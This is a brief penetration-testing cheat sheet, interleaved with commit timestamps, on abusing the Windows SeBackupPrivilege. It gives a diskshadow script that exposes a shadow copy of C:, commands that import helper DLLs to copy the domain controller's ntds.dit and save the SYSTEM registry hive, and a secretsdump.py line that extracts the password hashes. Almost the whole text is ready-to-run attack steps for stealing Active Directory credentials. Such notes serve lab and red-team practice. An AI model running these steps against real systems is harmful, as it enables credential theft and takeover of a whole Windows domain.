2022-01-09 22:52:39 +01:00
# SEBackupPrivilege Escalation
* Check user privileges to escalate
## Usage
* Check `whoami /all`
* `SeBackupPrivilege` must be present
* [Payloads all the things ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#using-diskshadow-a-windows-signed-binary )
2022-03-10 01:31:54 +01:00
* Upload `diskshadow.txt` to the target with the following content, there has to be a space at the end of each line!!!!
2022-01-09 22:52:39 +01:00
```sh
set metadata C:\tmp\tmp.cabs
set context persistent nowriters
add volume c: alias someAlias
create
2022-03-10 01:31:54 +01:00
expose %someAlias% h:
2022-01-09 22:52:39 +01:00
```
2022-03-10 01:31:54 +01:00
* Change dir to `C:\Windows\System32` and `diskshadow.exe /s C:\tmp\diskshadow.txt`
2022-01-09 22:52:39 +01:00
* Upload these [dlls ](https://github.com/giuliano108/SeBackupPrivilege ) to the target
```sh
import-module .\SeBackupPrivilegeUtils.dll
import-module .\SeBackupPrivilegeCmdLets.dll
copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite
2022-03-10 01:31:54 +01:00
reg save HKLM\SYSTEM C:\tmp\system
2022-01-09 22:52:39 +01:00
```
* Downloads the files `ntds.dit` and `system`
* Extract the hashes via
```sh
secretsdump.py -system system -ntds ntds.dit LOCAL > out.txt
```